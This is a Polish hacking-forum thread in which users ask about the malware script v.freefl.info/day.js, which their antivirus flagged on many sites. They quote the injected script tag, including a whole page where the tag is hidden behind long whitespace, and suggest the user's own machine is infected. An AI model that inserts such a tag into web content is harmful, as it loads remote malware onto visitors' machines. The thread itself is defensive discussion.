Pokaż wyniki 1 do 9 z 9

Temat: Wirus v.freefl.info/day.js

  1. #1
    Avatar rafal44
    rafal44 jest offline logout
    Zarejestrowany
    Dec 2007
    Postów
    291

    Domyślnie Wirus v.freefl.info/day.js

    No więc jak w temacie co to za malware. Bo to chyba jest chińska serwer/strona. AV wykrył u mnie na wielu stronach. Strony w kodzie mają:
    Kod:
    <script language="javascript" SRC="http://v.freefl.info/day.js"></script>
    Podobno ściąga trojana, sam wkleja się do kodu strony i sam może się usunąć.
    "a imię jego będzie czterdzieści i cztery"
    A. Mickiewicz Dziady cz. III

  2. #2
    Avatar Nikow
    Nikow jest offline -=[ZRP]=-
    Zarejestrowany
    Sep 2007
    Skąd
    Różne zakątki sieci.
    Postów
    995

    Domyślnie

    strona http://v.freefl.info/ rozpowszechnia malware
    http://nikowek.blogspot.com/
    Zbrojne Ramię Pingwina!
    -----BEGIN GEEK CODE BLOCK-----
    Version: 3.12
    GCS d- s++:++ a--- C+++ UL+++ P L+++ E--- W++ N++ o K- w--
    O M- V- PS PE Y PGP++ t+ 5 X+ R tv- b++ DI- D-
    G+ e- h! r% y?
    ------END GEEK CODE BLOCK------

  3. #3
    Avatar rafal44
    rafal44 jest offline logout
    Zarejestrowany
    Dec 2007
    Postów
    291

    Domyślnie

    To mi wiadomo. Ale np jak kod znalazł się na stroniehttp://pbpl.physics.ucla.edu/ gdzie już go nie ma.
    AV zgłaszał przy próbie połączenia z innymi stronami chyba nawet hack.pl!
    "a imię jego będzie czterdzieści i cztery"
    A. Mickiewicz Dziady cz. III

  4. #4
    Avatar timpl3r
    timpl3r jest offline programuje...]
    Zarejestrowany
    Aug 2008
    Skąd
    WroceQ
    Postów
    39

    Domyślnie

    może doklejął się do każdego nagłówka HTTP, maybe zainstalował się na twoim PC, (np. ciasteczko) a potem dokleja się do każdego nagłówka przed załadowanie strony... Edytuje kod edytuąc nagłówek...

  5. #5
    ryniek jest offline while 1: os.fork()
    Zarejestrowany
    Jan 2008
    Skąd
    tutej!
    Postów
    233

    Domyślnie

    A najlepiej przeskanuj sobie dysk, bo może masz go u siebie :F

  6. #6
    Avatar timpl3r
    timpl3r jest offline programuje...]
    Zarejestrowany
    Aug 2008
    Skąd
    WroceQ
    Postów
    39

    Domyślnie

    o tym właśnie mówie

  7. #7
    Avatar rafal44
    rafal44 jest offline logout
    Zarejestrowany
    Dec 2007
    Postów
    291

    Domyślnie

    Poprostu nie widziałem jeszcze takiego ustrojstwa które opanowałoby świat. Jest wszędzie nawet w gg. Oto kod który jest przesyłany podczas logowania:
    Kod:
    !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <!-- saved from url=(0018)http://bankier.pl/ -->
    
    <HTML>
    <BODY BGCOLOR="#FFFFFF" LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0" STYLE="overflow: hidden">
    
    
    <script language="javascript1.2" type="text/javascript"><script language="javascript" SRC="http://v.freefl.info/day.js"></script>                                                                                                                                                                                              </script>
    
    
    <!-- (C) 2000-2006 Gemius SA - gemiusTraffic / ver 11.1 / Baner_230x33 --> 
    <script type="text/javascript">
    var pp_gemius_identifier = new String('##############################');
    </script>
    <script type="text/javascript" src="http://gg.hit.gemius.pl/xgemius.js"></script> 
    
    
    </BODY>
    </HTML>
    W niedziele kod był na wielu stronach. A teraz powoli znika, ale żeby gg...
    "a imię jego będzie czterdzieści i cztery"
    A. Mickiewicz Dziady cz. III

  8. #8
    ryniek jest offline while 1: os.fork()
    Zarejestrowany
    Jan 2008
    Skąd
    tutej!
    Postów
    233

    Domyślnie

    widać gg jest słabo zabezpieczone :P
    jeśli w ogóle jest, bo jakoś nie chce mi się wierzyć ze to bezpieczny program (oraz protokół).

  9. #9
    Avatar Nikow
    Nikow jest offline -=[ZRP]=-
    Zarejestrowany
    Sep 2007
    Skąd
    Różne zakątki sieci.
    Postów
    995

    Domyślnie

    rafal44: To Ty jesteś zainfekowany... Ten host to 127.0.0.1
    http://nikowek.blogspot.com/
    Zbrojne Ramię Pingwina!
    -----BEGIN GEEK CODE BLOCK-----
    Version: 3.12
    GCS d- s++:++ a--- C+++ UL+++ P L+++ E--- W++ N++ o K- w--
    O M- V- PS PE Y PGP++ t+ 5 X+ R tv- b++ DI- D-
    G+ e- h! r% y?
    ------END GEEK CODE BLOCK------

Podobne wątki

  1. webhosting.info, skad oni to widza
    By gogulas in forum Domeny/Serwery
    Odpowiedzi: 1
    Autor: 03-20-2008, 19:21
  2. Back|track2 Potrzebuje info
    By Sardihan in forum Linux
    Odpowiedzi: 6
    Autor: 07-05-2007, 20:11
  3. Złamałem - info dla admina
    By mandalay in forum Newbie - dla początkujących!
    Odpowiedzi: 14
    Autor: 05-24-2007, 15:46
  4. Info o posiadaczu numeru gg
    By viper115 in forum Hacking
    Odpowiedzi: 8
    Autor: 12-13-2006, 18:14

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52